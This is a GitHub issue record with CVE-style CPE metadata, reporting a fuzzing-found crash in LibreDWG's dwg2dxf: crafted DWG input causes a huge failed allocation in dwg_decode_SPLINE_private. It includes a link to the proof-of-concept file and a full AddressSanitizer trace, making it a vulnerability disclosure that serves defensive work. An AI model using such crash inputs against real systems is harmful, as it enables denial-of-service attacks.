[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "B6967607-F26E-477A-8D60-8B0D55594EC9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/176#issuecomment-568643383
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # #
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/176/comments
24
2019-12-24T03:44:32
2020-01-16T12:12:03Z
https://github.com/LibreDWG/libredwg/issues/176
541,977,765
176
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf $PoC **1.Crafted input will lead to Memory allocation failed in dwg_decode_SPLINE_private (src/dwg.spec:1639)** PoC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG/id:000000%2Csig:06%2Csrc:000000%2Cop:flip1%2Cpos:36317 ASAN says: ``` ==6231==ERROR: AddressSanitizer failed to allocate 0xd54f86000 (57260138496) bytes of LargeMmapAllocator (error code: 12) ==6231==Process memory map follows: 0x00007fff7000-0x00008fff7000 0x00008fff7000-0x02008fff7000 0x02008fff7000-0x10007fff8000 0x55f7ba14f000-0x55f7bb643000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb843000-0x55f7bb85b000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb85b000-0x55f7bb93f000 /home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf 0x55f7bb93f000-0x55f7bb943000 ..... 0x7fd78077d000-0x7fd780794000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780794000-0x7fd780993000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780993000-0x7fd780994000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780994000-0x7fd780995000 /lib/x86_64-linux-gnu/libgcc_s.so.1 0x7fd780995000-0x7fd7809af000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd7809af000-0x7fd780bae000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bae000-0x7fd780baf000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780baf000-0x7fd780bb0000 /lib/x86_64-linux-gnu/libpthread-2.27.so 0x7fd780bb0000-0x7fd780bb4000 0x7fd780bb4000-0x7fd780bbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780bbb000-0x7fd780dba000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dba000-0x7fd780dbb000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbb000-0x7fd780dbc000 /lib/x86_64-linux-gnu/librt-2.27.so 0x7fd780dbc000-0x7fd780dbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780dbf000-0x7fd780fbe000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbe000-0x7fd780fbf000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fbf000-0x7fd780fc0000 /lib/x86_64-linux-gnu/libdl-2.27.so 0x7fd780fc0000-0x7fd7811a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7811a7000-0x7fd7813a7000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813a7000-0x7fd7813ab000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ab000-0x7fd7813ad000 /lib/x86_64-linux-gnu/libc-2.27.so 0x7fd7813ad000-0x7fd7813b1000 0x7fd7813b1000-0x7fd78154e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78154e000-0x7fd78174d000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174d000-0x7fd78174e000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174e000-0x7fd78174f000 /lib/x86_64-linux-gnu/libm-2.27.so 0x7fd78174f000-0x7fd78189f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd78189f000-0x7fd781a9f000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781a9f000-0x7fd781aa2000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa2000-0x7fd781aa5000 /usr/lib/x86_64-linux-gnu/libasan.so.4.0.0 0x7fd781aa5000-0x7fd78270a000 0x7fd78270a000-0x7fd782731000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd78279d000-0x7fd782927000 0x7fd782927000-0x7fd782931000 0x7fd782931000-0x7fd782932000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782932000-0x7fd782933000 /lib/x86_64-linux-gnu/ld-2.27.so 0x7fd782933000-0x7fd782934000 0x7fffa34fe000-0x7fffa351f000 [stack] 0x7fffa35bc000-0x7fffa35bf000 [vvar] 0x7fffa35bf000-0x7fffa35c1000 [vdso] 0xffffffffff600000-0xffffffffff601000 [vsyscall] ==6231==End of process memory map. ==6231==AddressSanitizer CHECK failed: ../../../../src/libsanitizer/sanitizer_common/sanitizer_common.cc:118 "((0 && "unable to mmap")) != (0)" (0x0, 0x0) #0 0x7fd781838c02 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xe9c02) #1 0x7fd781857595 in __sanitizer::CheckFailed(char const*, int, char const*, unsigned long long, unsigned long long) (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x108595) #2 0x7fd781842492 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xf3492) #3 0x7fd78184e8a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xff8a5) #4 0x7fd78177b8f1 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2c8f1) #5 0x7fd78177604b (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x2704b) #6 0x7fd78182dd00 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded00) #7 0x55f7ba79bec8 in dwg_decode_SPLINE_private ../../src/dwg.spec:1639 #8 0x55f7ba7a4e19 in dwg_decode_SPLINE ../../src/dwg.spec:1585 #9 0x55f7bab4b89b in dwg_decode_add_object ../../src/decode.c:4738 #10 0x55f7bab5ef28 in decode_R13_R2000 ../../src/decode.c:1216 #11 0x55f7bab9161a in dwg_decode ../../src/decode.c:239 #12 0x55f7ba533f7a in dwg_read_file ../../src/dwg.c:206 #13 0x55f7ba53232d in main ../../programs/dwg2dxf.c:255 #14 0x7fd780fe1b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #15 0x55f7ba5332e9 in _start (/home/user/linhlhq/libredwg/obj-afl/programs/dwg2dxf+0x3e42e9) ``` Thanks, Linhlhq from Infiniti Team, VinCSS (a member of Vingroup) # # --- end body ---
5,103
[ -0.0405055396258831, 0.031743813306093216, -0.007575404830276966, -0.003014266723766923, 0.05926959216594696, 0.05052337422966957, -0.0038710550870746374, 0.040722645819187164, -0.013429478742182255, 0.02777389995753765, -0.0125920744612813, 0.00116499955765903, -0.00470264395698905, 0.008816002868115902, 0.008660928346216679, 0.011754671111702919, -0.010025586932897568, 0.011599595658481121, -0.024052103981375694, -0.031976427882909775, 0.014724353328347206, -0.008839264512062073, -0.027913466095924377, 0.027463749051094055, -0.015453205443918705, -0.0005776537000201643, 0.012940993532538414, -0.009630145505070686, -0.011491043493151665, 0.020795533433556557, 0.005881212186068296, 0.028611302375793457, 0.015639295801520348, 0.012708380818367004, 0.050616420805454254, -0.02940218523144722, 0.06879118829965591, 0.06395285576581955, 0.018686514347791672, 0.0352950282394886, -0.0005975226522423327, -0.0746840313076973, -0.02031480148434639, 0.014305651187896729, -0.0012153988936915994, -0.008374040015041828, 0.016763586550951004, -0.0015468712663277984, -0.0038245324976742268, 0.01857796311378479, -0.022082652896642685, -0.007652942091226578, -0.038117390125989914, -0.06903930753469467, 0.011793439276516438, -0.013638829812407494, 0.03467473015189171, 0.028161585330963135, 0.010289213620126247, 0.005857951007783413, -0.015383421443402767, 0.02802201919257641, -0.011491043493151665, 0.022237729281187057, 0.019229276105761528, 0.017275333404541016, -0.022547878324985504, 0.005342327523976564, -0.024842984974384308, -0.002023726236075163, -0.0028746994212269783, -0.04242846742272377, 0.010211676359176636, 0.021400325000286102, 0.019585948437452316, -0.01461580116301775, -0.00494688656181097, 0.0025083350483328104, -0.0068504298105835915, 0.011560827493667603, -0.022718459367752075, 0.041932228952646255, -0.03566720709204674, 0.012367216870188713, 0.009816235862672329, 0.0009629176929593086, -0.009149414487183094, -0.0758005678653717, 0.013444986194372177, -0.0468946248292923, -0.0007021981291472912, 0.038985807448625565, 0.02541676163673401, -0.0038012713193893433, 0.0014644877519458532, -0.005683491937816143, -0.04953089728951454, -0.005415987689048052, -0.05005814880132675, 0.0004497169575188309, -0.04655345901846886, -0.004671628586947918, -0.009537100791931152, 0.010754438117146492, 0.02279599756002426, 0.02153989113867283, 0.014173838309943676, 0.0015129486564546824, 0.012351708486676216, 0.11698844283819199, 0.01160734985023737, -0.0072032250463962555, -0.003020081901922822, 0.014879428781569004, 0.0006227223202586174, 0.011250677518546581, 0.028859423473477364, -0.021865548565983772, -0.0607583113014698, -0.021803518757224083, 0.007195471320301294, -0.034581683576107025, -0.026440255343914032, -0.011739163659512997, -0.03380630910396576, 0.01702721416950226, 0.01671706512570381, -0.02152438461780548, -0.010033340193331242, -0.012111343443393707, -0.026750406250357628, -0.04298673942685127, 0.01267736591398716, -0.04264557361602783, 0.029665812849998474, -0.0051833754405379295, -0.04416530579328537, 0.039451032876968384, 0.020051173865795135, 0.008560129441320896, -0.05706753209233284, -0.040660616010427475, 0.027107076719403267, -0.0017591299256309867, -0.03910986706614494, 0.00710242660716176, -0.040939752012491226, 0.009645653888583183, 0.0007957276538945735, -0.006400712765753269, -0.024238193407654762, -0.02124524861574173, 0.01915173977613449, 0.031045977026224136, 0.04435139521956444, -0.027277659624814987, 0.003332169959321618, 0.03101496212184429, 0.022609908133745193, -0.04444444179534912, 0.005792044103145599, -0.01209583505988121, 0.014220360666513443, -0.036783747375011444, -0.034178487956523895, -0.01189423818141222, 0.019818561151623726, 0.013553538359701633, -0.022005116567015648, 0.02048538252711296, 0.004974024835973978, -0.0016641465481370687, 0.030921917408704758, 0.04208730533719063, -0.05793594941496849, 0.005152360536158085, -0.003473675809800625, 0.01828332059085369, 0.00638132868334651, -0.01870202273130417, -0.000755505112465471, 0.004756920039653778, 0.005113591905683279, 0.01654648222029209, 0.012522291392087936, -0.004276188090443611, 0.0445685014128685, 0.0011950453044846654, -0.0012580443872138858, -0.023928044363856316, -0.00573001429438591, 0.00555555522441864, 0.0017155151581391692, -0.017988678067922592, 0.018128246068954468, -0.015654802322387695, -0.033775296062231064, 0.006160346791148186, 0.02639373391866684, -0.004000930115580559, 0.002640148624777794, 0.0020954483188688755, -0.013662091456353664, 0.014623555354773998, -0.013530277647078037, 0.0001531363814137876, -0.00655578775331378, 0.058773353695869446, 0.007241993676871061, -0.020113203674554825, -0.01747693121433258, -0.03362021967768669, 0.005086454097181559, 0.0033612465485930443, -0.02840970642864704, 0.005466387141495943, -0.014732107520103455, 0.02626967430114746, -0.028859423473477364, -0.022005116567015648, 0.020128710195422173, 0.0018337597139179707, 0.004326587542891502, -0.01010312419384718, -0.061905864626169205, -0.005458633415400982, 0.005059315823018551, 0.02580444887280464, -0.05247731879353523, -0.0051368530839681625, 0.020237263292074203, -0.03669070079922676, -0.002074125688523054, 0.00795533787459135, -0.023741954937577248, -0.015476466156542301, -0.010056601837277412, 0.007222609594464302, -0.02042335271835327, 0.004241296090185642, 0.036721717566251755, 0.014809644781053066, -0.007362176664173603, -0.005450879689306021, 0.007587035186588764, 0.027758391574025154, -0.016701556742191315, -0.0070171351544559, -0.017151273787021637, 0.020966114476323128, 0.014925951138138771, -0.015057764016091824, 0.013010776601731777, 0.023013101890683174, 0.011250677518546581, 0.014135069213807583, 0.032038457691669464, 0.022951072081923485, -0.01944638229906559, -0.04757695272564888, 0.04249049723148346, -0.010095370002090931, -0.006520895753055811, 0.0038652396760880947, 0.008544621989130974, -0.010808714665472507, -0.009917034767568111, 0.023757461458444595, -0.003190664341673255, -0.039047837257385254, 0.03870667517185211, -0.019539427012205124, 0.004090098198503256, -0.017275333404541016, -0.01239047758281231, 0.009855004027485847, 0.03315499424934387, -0.006575172301381826, 0.006377451587468386, -0.02609909139573574, 0.006652709562331438, 0.01777157373726368, -0.02546328492462635, 0.03566720709204674, -0.006334806326776743, -0.019725516438484192, -0.020004650577902794, -0.02586647868156433, -0.01910521648824215, -0.02054741233587265, -0.019477397203445435, -0.0007065596291795373, -0.036783747375011444, -0.012669612653553486, -0.010979296639561653, 0.04056757315993309, 0.012638597749173641, -0.004594091325998306, -0.036380551755428314, -0.016391407698392868, -0.025044582784175873, -0.016624020412564278, 0.001125261653214693, -0.009723191149532795, -0.036194462329149246, -0.0033302316442131996, -0.014801890589296818, 0.0283631831407547, -0.013173605315387249, -0.013142590411007404, 0.022315265610814095, -0.05387299135327339, -0.011359229683876038, -0.022268744185566902, -0.03166627883911133, -0.008947816677391529, 0.02309064008295536, -0.04677056521177292, 0.009157167747616768, 0.007947584614157677, -0.03830347955226898, 0.010932774282991886, -0.03948204591870308, 0.015205085277557373, 0.049406833946704865, -0.027587808668613434, -0.004322710447013378, 0.05430720001459122, -0.060634251683950424, 0.026843450963497162, 0.007676203269511461, -0.0303946640342474, -0.019523918628692627, -0.030255096033215523, -0.01282468717545271, -0.042118318378925323, -0.041994258761405945, 0.012623090296983719, 0.014569278806447983, -0.008560129441320896, -0.012227648869156837, 0.035108938813209534, -0.02101263776421547, -0.011188647709786892, 0.009188182651996613, -0.018546948209404945, 0.0170737374573946, -0.020190740004181862, 0.034519653767347336, -0.01377064362168312, 0.0011058772215619683, 0.05771884694695473, -0.009397533722221851, 0.02696751058101654, 0.002791346749290824, -0.05272543802857399, 0.008156935684382915, -0.0451577864587307, 0.022237729281187057, -0.008730712346732616, -0.0004918779013678432, -0.01270062755793333, -0.0020838177297264338, 0.02268744446337223, 0.02037683129310608, 0.0008601805893704295, -0.012708380818367004, 0.008335270918905735, 0.003219740930944681, 0.012584321200847626, -0.029247110709547997, 0.057563770562410355, -0.012499029748141766, -0.02281150594353676, -0.01997363567352295, -0.03146468102931976, 0.04056757315993309, 0.007854538969695568, -0.030704813078045845, 0.00931999646127224, -0.01870202273130417, -0.01111111044883728, 0.0003011843655258417, -0.03135612607002258, 0.028099555522203445, 0.04773202911019325, -0.01673257164657116, 0.04010234773159027, -0.013987747952342033, -0.03740404546260834, -0.0055671860463917255, 0.07611072063446045, -0.005838566925376654, -0.044072262942790985, 0.01498798094689846, 0.03690780699253082, -0.02603706158697605, -0.017089243978261948, 0.01498798094689846, -0.054617349058389664, -0.005602077580988407, 0.015181824564933777, -0.02315266989171505, -0.010296967811882496, 0.03309296444058418, 0.04097076505422592, -0.0031189422588795424, -0.016593005508184433, 0.021043652668595314, -0.0002912498894147575, -0.00022170852753333747, -0.013530277647078037, -0.014708845876157284, 0.004175389185547829, 0.06854306906461716, 0.02870434895157814, 0.0013840426690876484, 0.009823989123106003, -0.031697291880846024, 0.006602310109883547, 0.001762037631124258, 0.007587035186588764, 0.013530277647078037, 0.02361789345741272, -0.0006639140192419291, 0.0094052879139781, -0.010746684856712818, 0.017787082120776176, 0.02628518082201481, -0.038923777639865875, -0.030456693843007088, 0.020733501762151718, 0.02054741233587265, 0.02853376604616642, -0.026300689205527306, -0.03675273060798645, -0.012514537200331688, -0.03616344556212425, 0.01579437032341957, 0.0015468712663277984, 0.02198960818350315, 0.015042256563901901, -0.028378691524267197, 0.015298129990696907, -0.019120724871754646, -0.030596259981393814, -0.03734201565384865, -0.011816700920462608, 0.029665812849998474, -0.04717375710606575, 0.003394200000911951, 0.012723888270556927, -0.028347676619887352, -0.007083042059093714, 0.001463518594391644, -0.009948049671947956, -0.03146468102931976, -0.00816468894481659, 0.040784675627946854, 0.010227183811366558, -0.011870977468788624, 0.024098625406622887, -0.019074201583862305, -0.010421027429401875, 0.016065750271081924, 0.034922849386930466, 0.042738620191812515, -0.025959523394703865, 0.007664572913199663, 0.009552608244121075, 0.010583856143057346, 0.007753740530461073, 0.0034252149052917957, -0.003120880573987961, 0.001741684041917324, 0.04084670543670654, -0.005640846211463213, -0.0159106757491827, -0.02946421504020691, -0.009599130600690842, -0.0076025426387786865, -0.014476234093308449, 0.0018773744814097881, -0.031232068315148354, 0.0324106365442276, -0.015926184132695198, 0.039730168879032135, 0.01267736591398716, 0.022764982655644417, 0.03383732587099075, 0.02037683129310608, 0.01209583505988121, -0.02512211911380291, -0.04345196112990379, -0.003652011975646019, 0.02795998938381672, -0.0036054893862456083, -0.021974101662635803, 0.040722645819187164, 0.019942620769143105, 0.032441649585962296, -0.013615569099783897, 0.03165077045559883, -0.00749399047344923, 0.020159725099802017, 0.007284639403223991, -0.03272078558802605, -0.0044312626123428345, -0.002595564816147089, -0.04711172729730606, 0.009397533722221851, -0.02992943860590458, 0.022098161280155182, -0.05170194432139397, 0.004524307791143656, -0.014569278806447983, 0.0016563928220421076, -0.00008947090100264177, 0.0031751568894833326, 0.001965573290362954, -0.010335735976696014, -0.03923392668366432, -0.006648832466453314, 0.023416297510266304, 0.004264557268470526, 0.013778396882116795, 0.008753973059356213, -0.01261533610522747, 0.02540125511586666, -0.03402341529726982, -0.010405519977211952, -0.001306505291722715, -0.024098625406622887, 0.026952002197504044, -0.006974489893764257, 0.026347210630774498, -0.014173838309943676, 0.03576025366783142, -0.010614871047437191, -0.007521128281950951, -0.034178487956523895, 0.023338759317994118, -0.04124990105628967, 0.00440024770796299, 0.0022660307586193085, 0.019058695062994957, -0.0049507636576890945, 0.018376365303993225, 0.005757152568548918, -0.011211909353733063, -0.014887182042002678, 0.003287586150690913, -0.010436534881591797, 0.009389780461788177, -0.015445451252162457, 0.009792974218726158, -0.01505001075565815, -0.01857796311378479, 0.016686050221323967, 0.000051944003644166514, 0.013437232933938503, -0.013220127671957016, 0.024641387164592743, -0.0050787003710865974, 0.0053113121539354324, 0.008133674040436745, 0.0015013180673122406, 0.020237263292074203, -0.05678839609026909, -0.03135612607002258, 0.015352406539022923, 0.0004172481712885201, 0.011708148755133152, -0.006036287173628807, -0.02819260209798813, 0.0063115451484918594, -0.012599828653037548, 0.0021032022777944803, -0.006412343587726355, -0.0303791556507349, 0.0008451577159576118, -0.05393502116203308, -0.007994106970727444, 0.022997595369815826, 0.020624950528144836, -0.023059625178575516, -0.0011630611261352897, 0.0011756609892472625, 0.030999455600976944, -0.009102891199290752, 0.015755601227283478, 0.0023823368828743696, -0.001537179108709097, -0.005764906294643879, 0.016468945890665054, 0.007362176664173603, -0.009064123034477234, 0.00011697244917741045, -0.010250445455312729, -0.009568115696310997, -0.009971310384571552, 0.02656431496143341, 0.02194308675825596, -0.04943785071372986, -0.04016437754034996, 0.015833139419555664, 0.012219895608723164, -0.009327749721705914, -0.026083583012223244, 0.010529579594731331, 0.03206947073340416, 0.013010776601731777, 0.057842906564474106, -0.0007937892223708332, 0.022609908133745193, -0.0021439092233777046, 0.005850197281688452, 0.009250212460756302, -0.03275180235505104, 0.0190897099673748, 0.0028068542014807463, -0.023338759317994118, 0.010746684856712818, 0.005346204154193401, 0.01684112474322319, 0.035512130707502365, 0.008645420894026756, -0.0070636579766869545, -0.01671706512570381, -0.0009624330559745431, -0.030193066224455833, 0.016748080030083656, 0.007176087237894535, -0.017554469406604767, -0.020500890910625458, 0.031216559931635857, 0.03352717310190201, 0.02611459791660309, -0.014142823405563831, 0.011847715824842453, 0.00349499867297709, -0.005330696702003479, -0.00426843436434865, 0.01470109261572361, -0.016530975699424744, 0.008149181492626667, -0.005233774892985821, 0.021260756999254227, 0.04832131043076515, 0.05467937886714935, -0.01694967783987522, -0.007486236747354269, -0.004175389185547829, 0.018826082348823547, 0.01939985901117325, 0.0025102735962718725, 0.035512130707502365, 0.03693882003426552, 0.02650228515267372, 0.021338295191526413, -0.0034504146315157413, -0.001490656635724008, -0.0416841097176075, 0.009017600677907467, 0.0028533765580505133, 0.004388617351651192, -0.02974334917962551, 0.004807319026440382, 0.01574784703552723, 0.017849111929535866, -0.002364890882745385, -0.0016757772536948323, -0.0008815033943392336, -0.005943242460489273, -0.013243389315903187, -0.00859114434570074, 0.019539427012205124, 0.029727842658758163, -0.01239047758281231, 0.004159881733357906, -0.0034794912207871675, -0.007094672881066799, 0.011010311543941498, -0.012669612653553486, -0.025013567879796028, 0.0057067531161010265, -0.0009289950830861926, -0.0023222453892230988, -0.015554003417491913, -0.028967974707484245, 0.01921376958489418, -0.011646118946373463, 0.014197099022567272, 0.012801425531506538, 0.0387687049806118, -0.019585948437452316, 0.04348297789692879, -0.030487708747386932, -0.02025276981294155, 0.005039931274950504, -0.02344731241464615, 0.001645731506869197, 0.003861362813040614, -0.019058695062994957, 0.022764982655644417, 0.014259128831326962, -0.013476001098752022, -0.006559664849191904, 0.02448631264269352, 0.01397999469190836, -0.011343722231686115, 0.0073738074861466885, -0.025509806349873543, 0.00645111221820116, 0.002397844335064292, -0.023509342223405838, 0.013065053150057793, 0.014189345762133598, -0.0045979684218764305, 0.005896719638258219, -0.010901759378612041, -0.03957509249448776, 0.006900829263031483, -0.04832131043076515, 0.00013060207129456103, -0.02343180403113365, 0.0035744744818657637, -0.00005573001180891879, -0.0030297741759568453, 0.009164921939373016, 0.015778861939907074, -0.024207178503274918, 0.022904550656676292, 0.016484452411532402, -0.03802434355020523, 0.016655035316944122, 0.023354267701506615, -0.01719779707491398, 0.004722028039395809, 0.012568813748657703, -0.0024346746504306793, 0.014073039405047894, 0.028735363855957985, -0.022671937942504883, -0.007594788912683725, 0.012382724322378635, 0.008141427300870419, -0.0028301153797656298, -0.01760099083185196, 0.029309140518307686, 0.004283941816538572, 0.013879195787012577, 0.0001984473055927083, -0.01984957605600357, -0.002682794351130724, -0.012661858461797237, 0.027355197817087173, -0.028394198045134544, 0.008839264512062073, -0.014871674589812756, -0.03439559414982796, 0.0364735946059227, -0.009203690104186535, 0.022764982655644417, 0.04351399466395378, -0.017895633354783058, 0.004497169516980648, -0.04087772220373154, 0.014452972449362278, 0.0036636425647884607, 0.03188338130712509, -0.0032333098351955414, -0.01380941178649664, -0.006505388300865889, 0.010335735976696014, -0.007939830422401428, 0.016344886273145676, 0.003960222937166691, 0.030069006606936455, 0.013995502144098282, -0.014197099022567272, -0.0033612465485930443, -0.03222454711794853, 0.006462743040174246, -0.0015051949303597212, -0.0031926026567816734, 0.04000930115580559, -0.012274171225726604, -0.0009154260042123497, 0.018562454730272293, 0.004105605650693178, -0.009312242269515991, 0.03917189687490463, -0.019291307777166367, -0.005574939772486687, -0.01724431850016117, 0.021508876234292984, 0.009823989123106003, 